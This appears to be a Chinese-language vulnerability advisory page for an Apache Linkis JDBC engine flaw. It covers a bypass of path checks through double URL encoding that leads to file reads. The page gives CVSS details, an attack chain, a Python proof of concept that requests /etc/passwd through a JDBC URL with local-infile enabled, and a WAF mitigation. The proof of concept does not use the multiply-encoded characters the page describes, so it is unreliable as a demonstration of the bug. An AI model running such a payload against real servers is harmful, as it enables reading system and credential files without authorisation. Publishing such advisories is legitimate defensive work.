CVE-2025-29847 CVSS 7.5 高危

CVE-2025-29847 Apache Linkis JDBC引擎URL编码绕过导致文件读取漏洞

披露日期: 2026-01-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-29847

漏洞类型

安全绕过/文件读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Linkis

漏洞概述

Apache Linkis是一个微服务框架，提供了JDBC引擎和数据源功能。该漏洞存在于JDBC引擎连接处理中，当URL参数经过多次URL编码时，可以绕过系统的安全检查机制。攻击者利用此漏洞可以通过构造特殊的JDBC连接参数，绕过路径遍历限制并访问系统文件。这可能导致敏感信息泄露，包括配置文件、密钥、用户凭据等。漏洞影响范围从1.3.0到1.7.0版本，CVSS评分7.5，属于高危漏洞。

技术细节

漏洞源于Apache Linkis对JDBC连接URL的验证不充分。当URL参数包含多次编码的特殊字符（如%252e表示点号）时，系统可能只进行一次解码就进行安全检查，而实际连接时又会再次解码，导致检查被绕过。攻击者可以利用JDBC协议的特性，通过在连接参数中注入文件路径来读取服务器上的任意文件。

攻击链分析

STEP 1

信息收集

识别目标运行Apache Linkis版本1.3.0-1.7.0

STEP 2

构造恶意URL

使用多次URL编码构造特殊JDBC连接字符串

STEP 3

绕过检查

编码字符在解码后触发路径遍历

STEP 4

文件读取

利用JDBC参数读取服务器敏感文件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-server:9002/api/rest_j/v1'
payload = {
    'method': 'GET',
    'url': 'jdbc:mysql://localhost:3306/test?allowLoadLocalInfile=true',
    'params': {
        'file': '/etc/passwd'
    }
}

response = requests.post(target, json=payload, timeout=10)
print(response.json())

影响范围

Apache Linkis >=1.3.0 且 <1.8.0

防御指南

临时缓解措施

如果无法立即升级，可通过WAF规则拦截包含多次编码特征的请求

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表